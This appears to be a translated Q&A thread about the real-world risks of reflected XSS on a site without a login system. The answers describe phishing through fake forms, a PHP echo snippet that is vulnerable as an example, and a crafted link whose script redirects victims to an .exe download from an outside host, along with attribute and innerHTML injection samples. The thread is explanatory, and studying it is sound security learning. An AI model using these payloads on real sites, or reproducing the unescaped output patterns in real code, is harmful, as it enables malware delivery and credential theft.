How to damage a website using XSS / SQL injection?

4

I'm not a hacker, but I know some techniques. I'm training security and I was really thoughtful about it. Every time I inject a script, it is a alert() , nothing dangerous for the host (for example). I do not have a website, there is no way to forward cookies. What is the big risk of an XSS failure on a site without DB / login system? I have a real site here ( link ) that I find online. Yes, it is a potential mistake, however, as the site does not have a login system, and I do not know anything a black hat can do. What would "hackers / crackers" really do?

PS: To experiment with what I gave, I wrote <script>window.location = "https://www.google.com";</script> . I was forwarded to Google and returned to the page. Nothing happened.

    
asked by anonymous 21.06.2014 / 05:06

2 answers

10

There is no right way to exploit this. Basically you need to understand who accesses the site and what the focus of users is and often it is not enough to just use a technique, for example:

Let's assume that users of the site in question have an account on the XPTO Site. You could create a redirect or an iframe for a False Site XPTO page with a form and copy this data. As the user entered alone on the Site that has the XSS problem he will not find that he is being cheated. Another example would be to include a redirect to an .exe that targets the user's computer. This is commonly seen with bank pages or virtual wallets.

In the example in question XSS is not persistent , that is, is not saved inside the page, possibly there is no database. In this case the technique has to be adapted, it is common to pass the script through GET when the problem uses some form field.

<?php
$name = $_GET['nome'];
echo "Bem vindo $nome<br>";
?>

This is an example very similar to the mentioned site, the difference is that the information is passed through the GET of PHP and not through the JavaScript Prompt. In this case it would suffice to send users a link as

http://sitexpto.com.br/?nome=<script>location.href='http://link.para/arquivo.exe';</script>

A variant of this technique was widely used in the Orkut era, Google already used login "Com conta Google" by default, but there was an additional parameter called redirect , many sent this url with a redirect to a .exe or a página falsa de login file. I know the problem was not related to XSS but I think it worth mentioning.

In http://www.verinha.de site there is really an XSS problem, however when analyzing the source code you can see that the result is not stored anywhere, and that it is not possible to enter the value through the url. In general there is no application in this case, at least not using this technique alone.

I hope I have complimented on something.

    
21.06.2014 / 17:18
-2

I would have to think of something like this: Let's say you would have a text box, to type something, such as username:

User Name : <input ... value="Nome">

Now, if you type like this: "onmouseover=" event

<input ... value=" "onmouseover="evento ">

Or something like this: We have a text box, type a browser, if we type such thing, it may appear "No results were found for [searched word]" And if we type: Code, and the browser or other site does not find anything, if it does not have any security, can execute the script. Let's say this is HTML:

<div>Não foi encntrado nenhum resultado para <script>alert("script")</script></div> 

Example 2:

<script type="text/javascript">
function Pesquise(){
/*Script do navegador ou parte de pesquisa de um site*/
document.getElementById("Result").innerHTML  = "Não foi encontrado nenhum resultado para " +  document.getElementById("CaixaPesquisa").value;
}
</script>

<input id="CaixaPesquisa" type="text" value="Código aqui"/><input type="submit" value="Pesquisar" onclick="Pesquise();"/>

<div id="Result">

</div>
    
23.08.2017 / 16:33